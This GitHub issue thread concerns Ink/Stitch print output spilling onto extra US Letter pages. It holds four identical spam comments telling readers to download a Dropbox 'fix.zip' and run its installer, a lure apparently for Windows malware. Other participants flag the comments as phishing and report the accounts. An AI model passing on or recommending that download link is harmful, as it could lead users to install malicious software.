### ISSUE TITLE
Print from PDF pagination for US Letter doesn't work right

### ISSUE THREAD

**Issue by owendelong** [inkstitch/inkstitch#3169]
I'm going to attach too files. The first (BeeGuild Logo InkStitch.pdf) is a browser file->save as->export to PDF from Safari. The second (BeeGuild Logo InkStitch  Print Result.pdf) is what happens if I click the Print button (or use Cmd-P or File->Print). The PDF is a Print-to-PDF from the print dialog, but the hard copy result is identical. Notice the spill-over of Page1 onto a mostly blank Page 2 and so on... Every odd page creates an unnecessary even page with a small amount of the content that should have fit on the odd page.

The behavior is identical on both Safari and Chrome on Mac (Sonoma 14.5.1)

Inkscape 1.3.2 (091e20e, 2023-11-25)
Ink/Stitch Version: v3.1.0 (osx) 2024-07-27 08:50
[BeeGuild Logo InkStitch Print Result.pdf](https://github.com/user-attachments/files/16742609/BeeGuild.Logo.InkStitch.Print.Result.pdf)
[BeeGuild Logo InkStitch.pdf](https://github.com/user-attachments/files/16742610/BeeGuild.Logo.InkStitch.pdf)

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by owendelong** [comment]
Not sure if those dropbox recommendations are legit or auto spam, but they won't work on Mac in any case as they are Win64 executables.

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by tyrosinase** [comment]
Yeah, that's spam/phishing crap. Gonna see if I can delete it.

**Comment by owendelong** [comment]
I reported each of the users to GitHub as well.

**Comment by kaalleen** [comment]
Looks as if in your export settings  it did set extra spacing at the border. The Ink/Stitch US Letter version has smaller borders. This extra space may cause the overflow.

**Comment by kaalleen** [comment]
Did the last answer help you with the issue? Can it be closed or do we need to take action in some way?

**Comment by kaalleen** [comment]
Closing. Unclear if the the correct answer has been given though. We will reopen if that was not the case.
